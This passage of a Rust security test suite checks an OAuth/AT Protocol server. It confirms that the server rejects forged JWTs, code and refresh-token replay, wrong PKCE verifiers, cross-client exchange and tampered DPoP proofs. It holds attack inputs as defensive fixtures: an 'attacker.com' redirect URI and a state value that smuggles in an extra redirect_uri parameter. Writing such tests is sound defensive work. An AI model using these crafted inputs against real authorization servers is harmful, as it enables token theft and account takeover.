260
-
});
261
-
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
262
-
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
263
-
let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 32]);
264
-
let expired_token = format!("{}.{}.{}", header_b64, payload_b64, fake_sig);
265
-
let res = http_client
266
-
.get(format!("{}/xrpc/com.atproto.server.getSession", url))
267
-
.header("Authorization", format!("Bearer {}", expired_token))
268
-
.send()
269
-
.await
270
-
.unwrap();
271
-
assert_eq!(
272
-
res.status(),
273
-
StatusCode::UNAUTHORIZED,
274
-
"Expired token should be rejected"
275
-
);
276
-
}
277
-
278
-
#[tokio::test]
279
-
async fn test_security_pkce_plain_method_rejected() {
280
-
let url = base_url().await;
281
-
let http_client = client();
282
-
let redirect_uri = "https://example.com/pkce-plain-callback";
283
let mock_client = setup_mock_client_metadata(redirect_uri).await;
284
let client_id = mock_client.uri();
285
-
let res = http_client
286
-
.post(format!("{}/oauth/par", url))
287
-
.form(&[
288
-
("response_type", "code"),
289
-
("client_id", &client_id),
290
-
("redirect_uri", redirect_uri),
291
-
("code_challenge", "plain-text-challenge"),
292
-
("code_challenge_method", "plain"),
293
-
])
294
-
.send()
295
-
.await
296
-
.unwrap();
297
-
assert_eq!(
298
-
res.status(),
299
-
StatusCode::BAD_REQUEST,
300
-
"PKCE plain method should be rejected"
301
-
);
302
let body: Value = res.json().await.unwrap();
303
-
assert_eq!(body["error"], "invalid_request");
304
-
assert!(
305
-
body["error_description"]
306
-
.as_str()
307
-
.unwrap()
308
-
.to_lowercase()
309
-
.contains("s256"),
310
-
"Error should mention S256 requirement"
311
-
);
312
-
}
313
-
314
-
#[tokio::test]
315
-
async fn test_security_pkce_missing_challenge_rejected() {
316
-
let url = base_url().await;
317
-
let http_client = client();
318
-
let redirect_uri = "https://example.com/no-pkce-callback";
319
-
let mock_client = setup_mock_client_metadata(redirect_uri).await;
320
-
let client_id = mock_client.uri();
321
-
let res = http_client
322
-
.post(format!("{}/oauth/par", url))
323
-
.form(&[
324
-
("response_type", "code"),
325
-
("client_id", &client_id),
326
-
("redirect_uri", redirect_uri),
327
-
])
328
-
.send()
329
-
.await
330
-
.unwrap();
331
-
assert_eq!(
332
-
res.status(),
333
-
StatusCode::BAD_REQUEST,
334
-
"Missing PKCE challenge should be rejected"
335
-
);
336
-
}
337
-
338
-
#[tokio::test]
339
-
async fn test_security_pkce_wrong_verifier_rejected() {
340
-
let url = base_url().await;
341
-
let http_client = client();
342
let ts = Utc::now().timestamp_millis();
343
let handle = format!("pkce-attack-{}", ts);
344
-
let email = format!("pkce-attack-{}@example.com", ts);
345
-
let password = "pkce-attack-password";
346
-
http_client
347
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
348
-
.json(&json!({
349
-
"handle": handle,
350
-
"email": email,
351
-
"password": password
352
-
}))
353
-
.send()
354
-
.await
355
-
.unwrap();
356
-
let redirect_uri = "https://example.com/pkce-attack-callback";
357
-
let mock_client = setup_mock_client_metadata(redirect_uri).await;
358
-
let client_id = mock_client.uri();
359
let (_, code_challenge) = generate_pkce();
360
let (attacker_verifier, _) = generate_pkce();
361
-
let par_body: Value = http_client
362
-
.post(format!("{}/oauth/par", url))
363
-
.form(&[
364
-
("response_type", "code"),
365
-
("client_id", &client_id),
366
-
("redirect_uri", redirect_uri),
367
-
("code_challenge", &code_challenge),
368
-
("code_challenge_method", "S256"),
369
-
])
370
-
.send()
371
-
.await
372
-
.unwrap()
373
-
.json()
374
-
.await
375
-
.unwrap();
376
let request_uri = par_body["request_uri"].as_str().unwrap();
377
let auth_client = no_redirect_client();
378
-
let auth_res = auth_client
379
-
.post(format!("{}/oauth/authorize", url))
380
-
.form(&[
381
-
("request_uri", request_uri),
382
-
("username", &handle),
383
-
("password", password),
384
-
("remember_device", "false"),
385
-
])
386
-
.send()
387
-
.await
388
-
.unwrap();
389
-
let location = auth_res
390
-
.headers()
391
-
.get("location")
392
-
.unwrap()
393
-
.to_str()
394
-
.unwrap();
395
-
let code = location
396
-
.split("code=")
397
-
.nth(1)
398
-
.unwrap()
399
-
.split('&')
400
-
.next()
401
-
.unwrap();
402
-
let token_res = http_client
403
-
.post(format!("{}/oauth/token", url))
404
-
.form(&[
405
-
("grant_type", "authorization_code"),
406
-
("code", code),
407
-
("redirect_uri", redirect_uri),
408
-
("code_verifier", &attacker_verifier),
409
-
("client_id", &client_id),
410
-
])
411
-
.send()
412
-
.await
413
-
.unwrap();
414
-
assert_eq!(
415
-
token_res.status(),
416
-
StatusCode::BAD_REQUEST,
417
-
"Wrong PKCE verifier should be rejected"
418
-
);
419
-
let body: Value = token_res.json().await.unwrap();
420
-
assert_eq!(body["error"], "invalid_grant");
421
}
422
423
#[tokio::test]
424
-
async fn test_security_authorization_code_replay_attack() {
425
let url = base_url().await;
426
let http_client = client();
427
let ts = Utc::now().timestamp_millis();
428
-
let handle = format!("code-replay-{}", ts);
429
-
let email = format!("code-replay-{}@example.com", ts);
430
-
let password = "code-replay-password";
431
-
http_client
432
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
433
-
.json(&json!({
434
-
"handle": handle,
435
-
"email": email,
436
-
"password": password
437
-
}))
438
-
.send()
439
-
.await
440
-
.unwrap();
441
-
let redirect_uri = "https://example.com/code-replay-callback";
442
let mock_client = setup_mock_client_metadata(redirect_uri).await;
443
let client_id = mock_client.uri();
444
let (code_verifier, code_challenge) = generate_pkce();
445
-
let par_body: Value = http_client
446
-
.post(format!("{}/oauth/par", url))
447
-
.form(&[
448
-
("response_type", "code"),
449
-
("client_id", &client_id),
450
-
("redirect_uri", redirect_uri),
451
-
("code_challenge", &code_challenge),
452
-
("code_challenge_method", "S256"),
453
-
])
454
-
.send()
455
-
.await
456
-
.unwrap()
457
-
.json()
458
-
.await
459
-
.unwrap();
460
let request_uri = par_body["request_uri"].as_str().unwrap();
461
let auth_client = no_redirect_client();
462
-
let auth_res = auth_client
463
-
.post(format!("{}/oauth/authorize", url))
464
-
.form(&[
465
-
("request_uri", request_uri),
466
-
("username", &handle),
467
-
("password", password),
468
-
("remember_device", "false"),
469
-
])
470
-
.send()
471
-
.await
472
-
.unwrap();
473
-
let location = auth_res
474
-
.headers()
475
-
.get("location")
476
-
.unwrap()
477
-
.to_str()
478
-
.unwrap();
479
-
let code = location
480
-
.split("code=")
481
-
.nth(1)
482
-
.unwrap()
483
-
.split('&')
484
-
.next()
485
-
.unwrap();
486
-
let stolen_code = code.to_string();
487
-
let first_res = http_client
488
-
.post(format!("{}/oauth/token", url))
489
-
.form(&[
490
-
("grant_type", "authorization_code"),
491
-
("code", code),
492
-
("redirect_uri", redirect_uri),
493
-
("code_verifier", &code_verifier),
494
-
("client_id", &client_id),
495
-
])
496
-
.send()
497
-
.await
498
-
.unwrap();
499
-
assert_eq!(
500
-
first_res.status(),
501
-
StatusCode::OK,
502
-
"First use should succeed"
503
-
);
504
-
let replay_res = http_client
505
-
.post(format!("{}/oauth/token", url))
506
-
.form(&[
507
-
("grant_type", "authorization_code"),
508
-
("code", &stolen_code),
509
-
("redirect_uri", redirect_uri),
510
-
("code_verifier", &code_verifier),
511
-
("client_id", &client_id),
512
-
])
513
-
.send()
514
-
.await
515
-
.unwrap();
516
-
assert_eq!(
517
-
replay_res.status(),
518
-
StatusCode::BAD_REQUEST,
519
-
"Replay attack should fail"
520
-
);
521
-
let body: Value = replay_res.json().await.unwrap();
522
-
assert_eq!(body["error"], "invalid_grant");
523
}
524
525
#[tokio::test]
526
-
async fn test_security_refresh_token_replay_attack() {
527
-
let url = base_url().await;
528
-
let http_client = client();
529
-
let ts = Utc::now().timestamp_millis();
530
-
let handle = format!("rt-replay-{}", ts);
531
-
let email = format!("rt-replay-{}@example.com", ts);
532
-
let password = "rt-replay-password";
533
-
http_client
534
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
535
-
.json(&json!({
536
-
"handle": handle,
537
-
"email": email,
538
-
"password": password
539
-
}))
540
-
.send()
541
-
.await
542
-
.unwrap();
543
-
let redirect_uri = "https://example.com/rt-replay-callback";
544
-
let mock_client = setup_mock_client_metadata(redirect_uri).await;
545
-
let client_id = mock_client.uri();
546
-
let (code_verifier, code_challenge) = generate_pkce();
547
-
let par_body: Value = http_client
548
-
.post(format!("{}/oauth/par", url))
549
-
.form(&[
550
-
("response_type", "code"),
551
-
("client_id", &client_id),
552
-
("redirect_uri", redirect_uri),
553
-
("code_challenge", &code_challenge),
554
-
("code_challenge_method", "S256"),
555
-
])
556
-
.send()
557
-
.await
558
-
.unwrap()
559
-
.json()
560
-
.await
561
-
.unwrap();
562
-
let request_uri = par_body["request_uri"].as_str().unwrap();
563
-
let auth_client = no_redirect_client();
564
-
let auth_res = auth_client
565
-
.post(format!("{}/oauth/authorize", url))
566
-
.form(&[
567
-
("request_uri", request_uri),
568
-
("username", &handle),
569
-
("password", password),
570
-
("remember_device", "false"),
571
-
])
572
-
.send()
573
-
.await
574
-
.unwrap();
575
-
let location = auth_res
576
-
.headers()
577
-
.get("location")
578
-
.unwrap()
579
-
.to_str()
580
-
.unwrap();
581
-
let code = location
582
-
.split("code=")
583
-
.nth(1)
584
-
.unwrap()
585
-
.split('&')
586
-
.next()
587
-
.unwrap();
588
-
let token_body: Value = http_client
589
-
.post(format!("{}/oauth/token", url))
590
-
.form(&[
591
-
("grant_type", "authorization_code"),
592
-
("code", code),
593
-
("redirect_uri", redirect_uri),
594
-
("code_verifier", &code_verifier),
595
-
("client_id", &client_id),
596
-
])
597
-
.send()
598
-
.await
599
-
.unwrap()
600
-
.json()
601
-
.await
602
-
.unwrap();
603
-
let stolen_refresh_token = token_body["refresh_token"].as_str().unwrap().to_string();
604
-
let first_refresh: Value = http_client
605
-
.post(format!("{}/oauth/token", url))
606
-
.form(&[
607
-
("grant_type", "refresh_token"),
608
-
("refresh_token", &stolen_refresh_token),
609
-
("client_id", &client_id),
610
-
])
611
-
.send()
612
-
.await
613
-
.unwrap()
614
-
.json()
615
-
.await
616
-
.unwrap();
617
-
assert!(
618
-
first_refresh["access_token"].is_string(),
619
-
"First refresh should succeed"
620
-
);
621
-
let new_refresh_token = first_refresh["refresh_token"].as_str().unwrap();
622
-
let replay_res = http_client
623
-
.post(format!("{}/oauth/token", url))
624
-
.form(&[
625
-
("grant_type", "refresh_token"),
626
-
("refresh_token", &stolen_refresh_token),
627
-
("client_id", &client_id),
628
-
])
629
-
.send()
630
-
.await
631
-
.unwrap();
632
-
assert_eq!(
633
-
replay_res.status(),
634
-
StatusCode::BAD_REQUEST,
635
-
"Refresh token replay should fail"
636
-
);
637
-
let body: Value = replay_res.json().await.unwrap();
638
-
assert_eq!(body["error"], "invalid_grant");
639
-
assert!(
640
-
body["error_description"]
641
-
.as_str()
642
-
.unwrap()
643
-
.to_lowercase()
644
-
.contains("reuse"),
645
-
"Error should mention token reuse"
646
-
);
647
-
let family_revoked_res = http_client
648
-
.post(format!("{}/oauth/token", url))
649
-
.form(&[
650
-
("grant_type", "refresh_token"),
651
-
("refresh_token", new_refresh_token),
652
-
("client_id", &client_id),
653
-
])
654
-
.send()
655
-
.await
656
-
.unwrap();
657
-
assert_eq!(
658
-
family_revoked_res.status(),
659
-
StatusCode::BAD_REQUEST,
660
-
"Token family should be revoked after replay detection"
661
-
);
662
-
}
663
-
664
-
#[tokio::test]
665
-
async fn test_security_redirect_uri_manipulation() {
666
let url = base_url().await;
667
let http_client = client();
668
let registered_redirect = "https://legitimate-app.com/callback";
669
-
let attacker_redirect = "https://attacker.com/steal";
670
let mock_client = setup_mock_client_metadata(registered_redirect).await;
671
let client_id = mock_client.uri();
672
let (_, code_challenge) = generate_pkce();
673
-
let res = http_client
674
-
.post(format!("{}/oauth/par", url))
675
-
.form(&[
676
-
("response_type", "code"),
677
-
("client_id", &client_id),
678
-
("redirect_uri", attacker_redirect),
679
-
("code_challenge", &code_challenge),
680
-
("code_challenge_method", "S256"),
681
-
])
682
-
.send()
683
-
.await
684
-
.unwrap();
685
-
assert_eq!(
686
-
res.status(),
687
-
StatusCode::BAD_REQUEST,
688
-
"Unregistered redirect_uri should be rejected"
689
-
);
690
-
}
691
-
692
-
#[tokio::test]
693
-
async fn test_security_deactivated_account_blocked() {
694
-
let url = base_url().await;
695
-
let http_client = client();
696
let ts = Utc::now().timestamp_millis();
697
-
let handle = format!("deact-sec-{}", ts);
698
-
let email = format!("deact-sec-{}@example.com", ts);
699
-
let password = "deact-sec-password";
700
-
let create_res = http_client
701
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
702
-
.json(&json!({
703
-
"handle": handle,
704
-
"email": email,
705
-
"password": password
706
-
}))
707
-
.send()
708
-
.await
709
-
.unwrap();
710
-
assert_eq!(create_res.status(), StatusCode::OK);
711
let account: Value = create_res.json().await.unwrap();
712
-
let did = account["did"].as_str().unwrap();
713
-
let access_jwt = verify_new_account(&http_client, did).await;
714
-
let deact_res = http_client
715
-
.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url))
716
-
.header("Authorization", format!("Bearer {}", access_jwt))
717
-
.json(&json!({}))
718
-
.send()
719
-
.await
720
-
.unwrap();
721
-
assert_eq!(deact_res.status(), StatusCode::OK);
722
-
let redirect_uri = "https://example.com/deact-sec-callback";
723
-
let mock_client = setup_mock_client_metadata(redirect_uri).await;
724
-
let client_id = mock_client.uri();
725
-
let (_, code_challenge) = generate_pkce();
726
-
let par_body: Value = http_client
727
-
.post(format!("{}/oauth/par", url))
728
-
.form(&[
729
-
("response_type", "code"),
730
-
("client_id", &client_id),
731
-
("redirect_uri", redirect_uri),
732
-
("code_challenge", &code_challenge),
733
-
("code_challenge_method", "S256"),
734
-
])
735
-
.send()
736
-
.await
737
-
.unwrap()
738
-
.json()
739
-
.await
740
-
.unwrap();
741
-
let request_uri = par_body["request_uri"].as_str().unwrap();
742
-
let auth_res = http_client
743
-
.post(format!("{}/oauth/authorize", url))
744
.header("Accept", "application/json")
745
-
.form(&[
746
-
("request_uri", request_uri),
747
-
("username", &handle),
748
-
("password", password),
749
-
("remember_device", "false"),
750
-
])
751
-
.send()
752
-
.await
753
-
.unwrap();
754
-
assert_eq!(
755
-
auth_res.status(),
756
-
StatusCode::FORBIDDEN,
757
-
"Deactivated account should be blocked from OAuth"
758
-
);
759
-
let body: Value = auth_res.json().await.unwrap();
760
-
assert_eq!(body["error"], "access_denied");
761
}
762
763
#[tokio::test]
764
-
async fn test_security_url_injection_in_state_parameter() {
765
let url = base_url().await;
766
let http_client = client();
767
-
let ts = Utc::now().timestamp_millis();
768
-
let handle = format!("inject-state-{}", ts);
769
-
let email = format!("inject-state-{}@example.com", ts);
770
-
let password = "inject-state-password";
771
-
http_client
772
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
773
-
.json(&json!({
774
-
"handle": handle,
775
-
"email": email,
776
-
"password": password
777
-
}))
778
-
.send()
779
-
.await
780
-
.unwrap();
781
-
let redirect_uri = "https://example.com/inject-callback";
782
-
let mock_client = setup_mock_client_metadata(redirect_uri).await;
783
-
let client_id = mock_client.uri();
784
-
let (code_verifier, code_challenge) = generate_pkce();
785
-
let malicious_state = "state&redirect_uri=https://attacker.com&extra=";
786
-
let par_body: Value = http_client
787
-
.post(format!("{}/oauth/par", url))
788
-
.form(&[
789
-
("response_type", "code"),
790
-
("client_id", &client_id),
791
-
("redirect_uri", redirect_uri),
792
-
("code_challenge", &code_challenge),
793
-
("code_challenge_method", "S256"),
794
-
("state", malicious_state),
795
-
])
796
-
.send()
797
-
.await
798
-
.unwrap()
799
-
.json()
800
-
.await
801
-
.unwrap();
802
-
let request_uri = par_body["request_uri"].as_str().unwrap();
803
-
let auth_client = no_redirect_client();
804
-
let auth_res = auth_client
805
-
.post(format!("{}/oauth/authorize", url))
806
-
.form(&[
807
-
("request_uri", request_uri),
808
-
("username", &handle),
809
-
("password", password),
810
-
("remember_device", "false"),
811
-
])
812
-
.send()
813
-
.await
814
-
.unwrap();
815
-
assert!(
816
-
auth_res.status().is_redirection(),
817
-
"Should redirect successfully"
818
-
);
819
-
let location = auth_res
820
-
.headers()
821
-
.get("location")
822
-
.unwrap()
823
-
.to_str()
824
-
.unwrap();
825
-
assert!(
826
-
location.starts_with(redirect_uri),
827
-
"Redirect should go to registered URI, not attacker URI. Got: {}",
828
-
location
829
-
);
830
-
let redirect_uri_count = location.matches("redirect_uri=").count();
831
-
assert!(
832
-
redirect_uri_count <= 1,
833
-
"State injection should not add extra redirect_uri parameters"
834
-
);
835
-
assert!(
836
-
location.contains(&urlencoding::encode(malicious_state).to_string())
837
-
|| location.contains("state=state%26redirect_uri"),
838
-
"State parameter should be properly URL-encoded. Got: {}",
839
-
location
840
-
);
841
}
842
843
#[tokio::test]
844
-
async fn test_security_cross_client_token_theft() {
845
let url = base_url().await;
846
let http_client = client();
847
-
let ts = Utc::now().timestamp_millis();
848
-
let handle = format!("cross-client-{}", ts);
849
-
let email = format!("cross-client-{}@example.com", ts);
850
-
let password = "cross-client-password";
851
-
http_client
852
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
853
-
.json(&json!({
854
-
"handle": handle,
855
-
"email": email,
856
-
"password": password
857
-
}))
858
-
.send()
859
-
.await
860
-
.unwrap();
861
-
let redirect_uri_a = "https://app-a.com/callback";
862
-
let mock_client_a = setup_mock_client_metadata(redirect_uri_a).await;
863
-
let client_id_a = mock_client_a.uri();
864
-
let redirect_uri_b = "https://app-b.com/callback";
865
-
let mock_client_b = setup_mock_client_metadata(redirect_uri_b).await;
866
-
let client_id_b = mock_client_b.uri();
867
-
let (code_verifier, code_challenge) = generate_pkce();
868
-
let par_body: Value = http_client
869
-
.post(format!("{}/oauth/par", url))
870
-
.form(&[
871
-
("response_type", "code"),
872
-
("client_id", &client_id_a),
873
-
("redirect_uri", redirect_uri_a),
874
-
("code_challenge", &code_challenge),
875
-
("code_challenge_method", "S256"),
876
-
])
877
-
.send()
878
-
.await
879
-
.unwrap()
880
-
.json()
881
-
.await
882
-
.unwrap();
883
-
let request_uri = par_body["request_uri"].as_str().unwrap();
884
-
let auth_client = no_redirect_client();
885
-
let auth_res = auth_client
886
-
.post(format!("{}/oauth/authorize", url))
887
-
.form(&[
888
-
("request_uri", request_uri),
889
-
("username", &handle),
890
-
("password", password),
891
-
("remember_device", "false"),
892
-
])
893
-
.send()
894
-
.await
895
-
.unwrap();
896
-
let location = auth_res
897
-
.headers()
898
-
.get("location")
899
-
.unwrap()
900
-
.to_str()
901
-
.unwrap();
902
-
let code = location
903
-
.split("code=")
904
-
.nth(1)
905
-
.unwrap()
906
-
.split('&')
907
-
.next()
908
-
.unwrap();
909
-
let token_res = http_client
910
-
.post(format!("{}/oauth/token", url))
911
-
.form(&[
912
-
("grant_type", "authorization_code"),
913
-
("code", code),
914
-
("redirect_uri", redirect_uri_a),
915
-
("code_verifier", &code_verifier),
916
-
("client_id", &client_id_b),
917
-
])
918
-
.send()
919
-
.await
920
-
.unwrap();
921
-
assert_eq!(
922
-
token_res.status(),
923
-
StatusCode::BAD_REQUEST,
924
-
"Cross-client code exchange must be explicitly rejected (defense-in-depth)"
925
-
);
926
-
let body: Value = token_res.json().await.unwrap();
927
-
assert_eq!(body["error"], "invalid_grant");
928
-
assert!(
929
-
body["error_description"]
930
-
.as_str()
931
-
.unwrap()
932
-
.contains("client_id"),
933
-
"Error should mention client_id mismatch"
934
-
);
935
}
936
937
-
#[test]
938
-
fn test_security_dpop_nonce_tamper_detection() {
939
-
let secret = b"test-dpop-secret-32-bytes-long!!";
940
-
let verifier = DPoPVerifier::new(secret);
941
-
let nonce = verifier.generate_nonce();
942
-
let nonce_bytes = URL_SAFE_NO_PAD.decode(&nonce).unwrap();
943
-
let mut tampered = nonce_bytes.clone();
944
-
if !tampered.is_empty() {
945
-
tampered[0] ^= 0xFF;
946
-
}
947
-
let tampered_nonce = URL_SAFE_NO_PAD.encode(&tampered);
948
-
let result = verifier.validate_nonce(&tampered_nonce);
949
-
assert!(result.is_err(), "Tampered nonce should be rejected");
950
-
}
951
-
952
-
#[test]
953
-
fn test_security_dpop_nonce_cross_server_rejected() {
954
-
let secret1 = b"server-1-secret-32-bytes-long!!!";
955
-
let secret2 = b"server-2-secret-32-bytes-long!!!";
956
-
let verifier1 = DPoPVerifier::new(secret1);
957
-
let verifier2 = DPoPVerifier::new(secret2);
958
-
let nonce_from_server1 = verifier1.generate_nonce();
959
-
let result = verifier2.validate_nonce(&nonce_from_server1);
960
-
assert!(
961
-
result.is_err(),
962
-
"Nonce from different server should be rejected"
963
-
);
964
-
}
965
-
966
-
#[test]
967
-
fn test_security_dpop_proof_signature_tampering() {
968
use p256::ecdsa::{Signature, SigningKey, signature::Signer};
969
use p256::elliptic_curve::sec1::ToEncodedPoint;
970
-
let secret = b"test-dpop-secret-32-bytes-long!!";
971
-
let verifier = DPoPVerifier::new(secret);
972
let signing_key = SigningKey::random(&mut rand::thread_rng());
973
-
let verifying_key = signing_key.verifying_key();
974
-
let point = verifying_key.to_encoded_point(false);
975
let x = URL_SAFE_NO_PAD.encode(point.x().unwrap());
976
let y = URL_SAFE_NO_PAD.encode(point.y().unwrap());
977
-
let header = json!({
978
-
"typ": "dpop+jwt",
979
-
"alg": "ES256",
980
-
"jwk": {
981
-
"kty": "EC",
982
-
"crv": "P-256",
983
-
"x": x,
984
-
"y": y
985
-
}
986
-
});
987
-
let payload = json!({
988
-
"jti": format!("tamper-test-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)),
989
-
"htm": "POST",
990
-
"htu": "https://example.com/token",
991
-
"iat": Utc::now().timestamp()
992
-
});
993
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
994
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
995
let signing_input = format!("{}.{}", header_b64, payload_b64);
996
let signature: Signature = signing_key.sign(signing_input.as_bytes());
997
-
let mut sig_bytes = signature.to_bytes().to_vec();
998
-
sig_bytes[0] ^= 0xFF;
999
-
let tampered_sig = URL_SAFE_NO_PAD.encode(&sig_bytes);
1000
-
let tampered_proof = format!("{}.{}.{}", header_b64, payload_b64, tampered_sig);
1001
-
let result = verifier.verify_proof(&tampered_proof, "POST", "https://example.com/token", None);
1002
-
assert!(
1003
-
result.is_err(),
1004
-
"Tampered DPoP signature should be rejected"
1005
-
);
1006
}
1007
1008
#[test]
1009
-
fn test_security_dpop_proof_key_substitution() {
1010
use p256::ecdsa::{Signature, SigningKey, signature::Signer};
1011
use p256::elliptic_curve::sec1::ToEncodedPoint;
1012
let secret = b"test-dpop-secret-32-bytes-long!!";
1013
let verifier = DPoPVerifier::new(secret);
1014
let signing_key = SigningKey::random(&mut rand::thread_rng());
1015
let attacker_key = SigningKey::random(&mut rand::thread_rng());
1016
-
let attacker_verifying = attacker_key.verifying_key();
1017
-
let attacker_point = attacker_verifying.to_encoded_point(false);
1018
let x = URL_SAFE_NO_PAD.encode(attacker_point.x().unwrap());
1019
let y = URL_SAFE_NO_PAD.encode(attacker_point.y().unwrap());
1020
-
let header = json!({
1021
-
"typ": "dpop+jwt",
1022
-
"alg": "ES256",
1023
-
"jwk": {
1024
-
"kty": "EC",
1025
-
"crv": "P-256",
1026
-
"x": x,
1027
-
"y": y
1028
-
}
1029
-
});
1030
-
let payload = json!({
1031
-
"jti": format!("key-sub-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)),
1032
-
"htm": "POST",
1033
-
"htu": "https://example.com/token",
1034
-
"iat": Utc::now().timestamp()
1035
-
});
1036
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
1037
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
1038
let signing_input = format!("{}.{}", header_b64, payload_b64);
1039
let signature: Signature = signing_key.sign(signing_input.as_bytes());
1040
-
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
1041
-
let mismatched_proof = format!("{}.{}.{}", header_b64, payload_b64, signature_b64);
1042
-
let result =
1043
-
verifier.verify_proof(&mismatched_proof, "POST", "https://example.com/token", None);
1044
-
assert!(
1045
-
result.is_err(),
1046
-
"DPoP proof with mismatched key should be rejected"
1047
-
);
1048
}
1049
1050
#[test]
1051
-
fn test_security_jwk_thumbprint_consistency() {
1052
-
let jwk = DPoPJwk {
1053
-
kty: "EC".to_string(),
1054
-
crv: Some("P-256".to_string()),
1055
x: Some("WbbXrPhtCg66wuF0NLhzXxF5PFzNZ7wNJm9M_1pCcXY".to_string()),
1056
-
y: Some("DubR6_2kU1H5EYhbcNpYZGy1EY6GEKKxv6PYx8VW0rA".to_string()),
1057
-
};
1058
-
let mut results = Vec::new();
1059
-
for _ in 0..100 {
1060
-
results.push(compute_jwk_thumbprint(&jwk).unwrap());
1061
-
}
1062
-
let first = &results[0];
1063
-
for (i, result) in results.iter().enumerate() {
1064
-
assert_eq!(
1065
-
first, result,
1066
-
"Thumbprint should be deterministic, but iteration {} differs",
1067
-
i
1068
-
);
1069
-
}
1070
}
1071
1072
#[test]
1073
-
fn test_security_dpop_iat_clock_skew_limits() {
1074
use p256::ecdsa::{Signature, SigningKey, signature::Signer};
1075
use p256::elliptic_curve::sec1::ToEncodedPoint;
1076
let secret = b"test-dpop-secret-32-bytes-long!!";
1077
let verifier = DPoPVerifier::new(secret);
1078
-
let test_offsets = vec![
1079
-
(-600, true),
1080
-
(-301, true),
1081
-
(-299, false),
1082
-
(0, false),
1083
-
(299, false),
1084
-
(301, true),
1085
-
(600, true),
1086
-
];
1087
-
for (offset_secs, should_fail) in test_offsets {
1088
let signing_key = SigningKey::random(&mut rand::thread_rng());
1089
-
let verifying_key = signing_key.verifying_key();
1090
-
let point = verifying_key.to_encoded_point(false);
1091
let x = URL_SAFE_NO_PAD.encode(point.x().unwrap());
1092
let y = URL_SAFE_NO_PAD.encode(point.y().unwrap());
1093
-
let header = json!({
1094
-
"typ": "dpop+jwt",
1095
-
"alg": "ES256",
1096
-
"jwk": {
1097
-
"kty": "EC",
1098
-
"crv": "P-256",
1099
-
"x": x,
1100
-
"y": y
1101
-
}
1102
-
});
1103
-
let payload = json!({
1104
-
"jti": format!("clock-{}-{}", offset_secs, Utc::now().timestamp_nanos_opt().unwrap_or(0)),
1105
-
"htm": "POST",
1106
-
"htu": "https://example.com/token",
1107
-
"iat": Utc::now().timestamp() + offset_secs
1108
-
});
1109
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
1110
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
1111
let signing_input = format!("{}.{}", header_b64, payload_b64);
1112
let signature: Signature = signing_key.sign(signing_input.as_bytes());
1113
-
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
1114
-
let proof = format!("{}.{}.{}", header_b64, payload_b64, signature_b64);
1115
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1116
-
if should_fail {
1117
-
assert!(
1118
-
result.is_err(),
1119
-
"iat offset {} should be rejected",
1120
-
offset_secs
1121
-
);
1122
-
} else {
1123
-
assert!(
1124
-
result.is_ok(),
1125
-
"iat offset {} should be accepted",
1126
-
offset_secs
1127
-
);
1128
-
}
1129
}
1130
}
1131
1132
#[test]
1133
-
fn test_security_dpop_method_case_insensitivity() {
1134
use p256::ecdsa::{Signature, SigningKey, signature::Signer};
1135
use p256::elliptic_curve::sec1::ToEncodedPoint;
1136
let secret = b"test-dpop-secret-32-bytes-long!!";
1137
let verifier = DPoPVerifier::new(secret);
1138
let signing_key = SigningKey::random(&mut rand::thread_rng());
1139
-
let verifying_key = signing_key.verifying_key();
1140
-
let point = verifying_key.to_encoded_point(false);
1141
-
let x = URL_SAFE_NO_PAD.encode(point.x().unwrap());
1142
-
let y = URL_SAFE_NO_PAD.encode(point.y().unwrap());
1143
-
let header = json!({
1144
-
"typ": "dpop+jwt",
1145
-
"alg": "ES256",
1146
-
"jwk": {
1147
-
"kty": "EC",
1148
-
"crv": "P-256",
1149
-
"x": x,
1150
-
"y": y
1151
-
}
1152
-
});
1153
-
let payload = json!({
1154
-
"jti": format!("case-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)),
1155
-
"htm": "post",
1156
-
"htu": "https://example.com/token",
1157
-
"iat": Utc::now().timestamp()
1158
-
});
1159
-
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap());
1160
-
let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap());
1161
-
let signing_input = format!("{}.{}", header_b64, payload_b64);
1162
-
let signature: Signature = signing_key.sign(signing_input.as_bytes());
1163
-
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
1164
-
let proof = format!("{}.{}.{}", header_b64, payload_b64, signature_b64);
1165
-
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1166
-
assert!(
1167
-
result.is_ok(),
1168
-
"HTTP method comparison should be case-insensitive"
1169
-
);
1170
-
}
1171
-
1172
-
#[tokio::test]
1173
-
async fn test_security_invalid_grant_type_rejected() {
1174
-
let url = base_url().await;
1175
-
let http_client = client();
1176
-
let grant_types = vec![
1177
-
"client_credentials",
1178
-
"password",
1179
-
"implicit",
1180
-
"urn:ietf:params:oauth:grant-type:jwt-bearer",
1181
-
"urn:ietf:params:oauth:grant-type:device_code",
1182
-
"",
1183
-
"AUTHORIZATION_CODE",
1184
-
"Authorization_Code",
1185
-
];
1186
-
for grant_type in grant_types {
1187
-
let res = http_client
1188
-
.post(format!("{}/oauth/token", url))
1189
-
.form(&[
1190
-
("grant_type", grant_type),
1191
-
